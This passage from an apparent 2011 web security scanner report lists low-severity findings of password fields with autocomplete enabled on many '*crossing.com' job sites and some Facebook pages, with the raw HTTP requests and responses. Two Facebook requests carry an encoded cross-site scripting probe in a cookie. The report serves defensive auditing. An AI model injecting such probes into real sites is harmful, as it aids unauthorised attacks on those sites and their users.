<form name="aspnetForm" method="post" action="/Secured/Content/Forms/Login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" onreset="if (window.setTimeout) window.setTimeout('VAM_OnReset(false);', 100);">
<div>
...[SNIP]...
<div class="signInInput">
                            <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword" type="password" maxlength="32" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbPassword" class="regTextBox" style="width:200px;" />
                            <span style='visibility:hidden' class='VAMErrorText' id='ctl00_ctl00_ctl00_MasterContent_SideNavContent_reqtbPassword'>
...[SNIP]...
<td valign="middle">
                                               <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer" type="password" maxlength="50" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbMFAnswer" onkeypress="return(VAM_KeyPress(this, event))" onkeydown="return(VAM_OnKeyDown(this, event))" style="width:182px;" />
                                           </td>
...[SNIP]...

11.20. http://www.businessanalystcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.businessanalystcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.businessanalystcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.21. http://www.businessdevelopmentcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.businessdevelopmentcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.businessdevelopmentcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.22. http://www.callcentercrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.callcentercrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.callcentercrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.23. http://www.chefcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.chefcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.chefcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.24. http://www.civilengineeringcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.civilengineeringcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.civilengineeringcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.25. http://www.clevelcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.clevelcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.clevelcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.26. http://www.clinicalresearchcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.clinicalresearchcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.clinicalresearchcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.27. http://www.compliancecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.compliancecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.compliancecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.28. http://www.computeraideddesigncrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.computeraideddesigncrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.computeraideddesigncrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.29. http://www.constructioncrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.constructioncrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.constructioncrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.30. http://www.consultingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.consultingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.consultingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.31. http://www.contractmanagementcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.contractmanagementcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.contractmanagementcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.32. http://www.counselingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.counselingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.counselingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.33. http://www.cpluspluscrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cpluspluscrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.cpluspluscrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.34. http://www.customerservicecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.customerservicecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.customerservicecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.35. http://www.dbacrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dbacrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.dbacrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.36. http://www.dentalcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dentalcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.dentalcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=od1eunkj1a6cadocmt8bfbgt55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111827

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dentalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.37. http://www.designingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.designingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.designingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.38. http://www.diversitycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.diversitycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.diversitycrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.39. http://www.dotnetcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dotnetcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.dotnetcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.40. http://www.ecommercecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ecommercecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.ecommercecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.41. http://www.editingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.editingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.editingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.42. http://www.educationcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.educationcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.educationcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.43. http://www.employmentcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.employmentcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.employmentcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.44. http://www.energycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.energycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.energycrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.45. http://www.engineeringcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.engineeringcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.engineeringcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.46. http://www.entrylevelcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.entrylevelcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.entrylevelcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.47. http://www.environmentalcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.environmentalcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.environmentalcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.48. http://www.environmentalsafetyhealthcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.environmentalsafetyhealthcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.environmentalsafetyhealthcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.49. http://www.ericmmartin.com/projects/simplemodal/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ericmmartin.com
Path:	/projects/simplemodal/

Issue detail

The page contains a form with the following action URL:

http://www.ericmmartin.com/wordpress/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.50. http://www.erpcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.erpcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.erpcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.51. http://www.execcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.execcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.execcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.52. http://www.facebook.com/BMWUSA previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BMWUSA

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

11.53. http://www.facebook.com/EmploymentXing previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/EmploymentXing

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

11.54. http://www.facebook.com/pages/JD2B/298408284363 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/JD2B/298408284363

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

11.55. http://www.facebook.com/piyush.v.bhatt previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/piyush.v.bhatt

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

11.56. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:24 GMT
Content-Length: 11419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

11.57. http://www.facebook.com/yahoonews previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/yahoonews

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /yahoonews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS;

Response

11.58. http://www.facilitiescrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facilitiescrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.facilitiescrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.59. http://www.financialservicescrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.financialservicescrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.financialservicescrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.60. http://www.foodservicescrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.foodservicescrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.foodservicescrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.61. http://www.fundraisingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.fundraisingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.fundraisingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.62. http://www.giscrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.giscrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.giscrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.63. http://www.governmentcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.governmentcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.governmentcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.64. http://www.graduateschoolloans.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.graduateschoolloans.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.graduateschoolloans.com/index.php

The form contains the following password field with autocomplete enabled:

clsregistration_password

Request

GET / HTTP/1.1
Host: www.graduateschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.65. http://www.healthcarecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.healthcarecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.healthcarecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.66. http://www.helpdeskcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.helpdeskcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.helpdeskcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.67. http://www.hospitalitycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hospitalitycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.hospitalitycrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.68. http://www.hrcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hrcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.hrcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.69. http://www.hvaccrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hvaccrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.hvaccrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.70. http://www.informationtechnologycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.informationtechnologycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.informationtechnologycrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.71. http://www.insurcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.insurcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.insurcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.72. http://www.intellectualpropertycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.intellectualpropertycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.intellectualpropertycrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ajhbe62huej7qoq1voq8lsteu4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118144

